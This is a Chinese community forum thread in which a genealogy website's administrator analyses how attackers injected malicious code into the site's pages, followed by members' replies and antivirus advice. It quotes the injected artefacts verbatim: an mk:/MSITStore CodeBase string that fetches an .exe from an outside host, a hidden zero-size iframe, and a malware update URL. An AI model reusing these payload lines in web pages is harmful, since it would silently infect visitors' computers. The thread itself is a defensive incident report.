[原创]五月四日网站病毒剖析

据守信、小达报道：5月4日以后，我们网站出现了木马病毒，5月6号回来后，我立刻展开了调查，事情如下：
1、病毒为骇客类，侵入了网站修改了网页代码，在网页上加上了如下代码： CodeBase: mk:%40MSITStore%3Amhtml%3Ac%3A\%2Emht%21http://bbs.gemeus.com/q17%2f1.js::/%23.exe
     CLSID: {00000000-0000-0000-0000-000000000000}
     Extension:
     Type: application/x-oleobject
也就是说，捣鬼的网站是http://bbs.gemeus.com/q17%2f1.js::/%23.exe
捣鬼的文件是q17%2f1.js::/%23.exe
2、经过查看临时文件夹，木马病毒将病毒文件寄放在临时文件夹下，妄想运行时，被我的天网防火墙阻止了。在临时文件夹下的几个文件名是：
1.exe
1.js
ah.js
CAY9GX8D.HTM
setup_jt.exe.txt
3、如果大家用三个热键查看进程，其中有上述文件，请结束进程，杀毒。
4、记得病毒当时提示，要把网上文件下载到windows目录下的Downloaded Program Files进行安装，其文件名为：#.exe
5、[update]
num=22
url=http://222.88.88.191/setup_jt.exe
这是病毒更新文件
6、如果5月4号到7号间曾打开过袁氏家谱网站或论坛的朋友，请杀毒。
7、这家伙在我网页尾加上了这样的语句：
<iframe src="http://bbs.gemeus.com/q17/index.htm"width="0" height="0"></iframe>
弹出一个窗口，其内容指向这个论坛。
----这是很不道德的宣传自己论坛的做法。人皆诛之。

真是太可恶了！大家要提高警惕才是。

哦,原来是这样.前几天就是无法登录咱们网站.我用江民软件杀了!谢谢大家.

太可恶了！那几天我这能上，但找不到各个栏目，我还以为论坛在维护呢。老论坛曾受攻击，守信忙乎了一星期。大家一定要提高警惕，有情况及时向管理员报告。

我的电脑中毒了!就是那天我打开网站后,我的电脑有警报,可是就是杀不出来!每次都有警报,怎么办呀??

除了用杀毒软件外，建议
1、安装超级兔子软件，对电脑垃圾文件进行清理，对注册表进行清理，
2、安装瑞星的KAKA软件，对电脑进行保护，
3、用杀毒软件杀一次毒，
4、也可在线查毒，你如果对电脑系统文件较熟悉，可以把有毒的文件用资源管理器直接删除
5、注意：直接删除文件，搞得不好会使电脑系统崩溃，务必小心!
6、对电脑运行的常用进程记住，到时候抓一幅图，发到QQ群上，请大家分析一下，哪是毒，哪不是毒。

现在下载瑞星可装不上。

大家使用电脑,什么软件都可以装盗版(不支持),唯独杀毒软件一定要用正版的,是购买的带光盘的,而且要经常升级(每天一次),网路上DOWN的杀毒软件可能会出问题吧(我没DOWN过),要保持高度警惕.

经过这一阵观察，没有病毒，我认为：
　　前段时间我们网站代码被加入指向代码的程序是人为的，可能的原因是，我们管理群中，有三人QQ被盗，贼人可能通过聊天记录看到了我们管理员登录的密码和帐号，顺利进去加入的非法链接。
　　我经过修改网站密码后半个多月来，没有发现问题，充分说明了这一点。
－－－－－－－－－－－－－－－－－－－－－－－－－－－－－
　　最后提供管理员管好自己的QQ，用手机或邮件绑一下。尽量不上网吧上网，如果去了，回来后把密码改一下。以防造成QQ被盗。

我的还是有那个问题,登录后换面就没了.怎么办?谁帮我!